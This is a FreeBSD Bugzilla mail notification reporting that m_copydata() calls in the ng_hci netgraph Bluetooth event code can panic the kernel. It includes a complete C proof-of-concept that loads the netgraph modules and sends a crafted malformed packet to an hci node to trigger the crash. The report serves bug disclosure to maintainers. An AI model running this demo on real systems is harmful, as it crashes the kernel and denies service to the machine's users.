[Bug 267294] inquiry_result() in ng_hci_event.c ought to check before calling m_copydata()
Date: Wed, 26 Oct 2022 21:28:58 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=267294 --- Comment #1 from Robert Morris <rtm@lcs.mit.edu> --- The m_copydata() calls in num_compl_pkts() in ng_hci_evnt.c can also panic. Here's a demo program: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <netinet/in.h> #include <sys/wait.h> #include <sys/resource.h> #include <arpa/inet.h> #include <assert.h> #include <ctype.h> #include <fcntl.h> #include <signal.h> #include <netgraph/ng_message.h> #include <netgraph/ng_socket.h> #include <netgraph.h> int main(){ setlinebuf(stdout); struct rlimit r; r.rlim_cur = r.rlim_max = 0; setrlimit(RLIMIT_CORE, &r); signal(SIGPIPE, SIG_IGN); system("kldload netgraph"); system("kldload ng_hci"); int cs = -1; int ds = -1; NgMkSockNode(NULL, &cs, &ds); struct ngm_mkpeer mkp; memset(&mkp, 0, sizeof(mkp)); strcpy(mkp.type, "hci"); strcpy(mkp.ourhook, "hook"); strcpy(mkp.peerhook, "drv"); if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, NGM_MKPEER, &mkp, sizeof(mkp)) < 0) { fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook); } char buf[128]; memset(buf, 0xff, sizeof(buf)); *(long long *)(buf + 0) ^= 0xecfb; NgSendData(ds, "hook", (unsigned char *)buf, 116); } -- You are receiving this mail because: You are the assignee for the bug.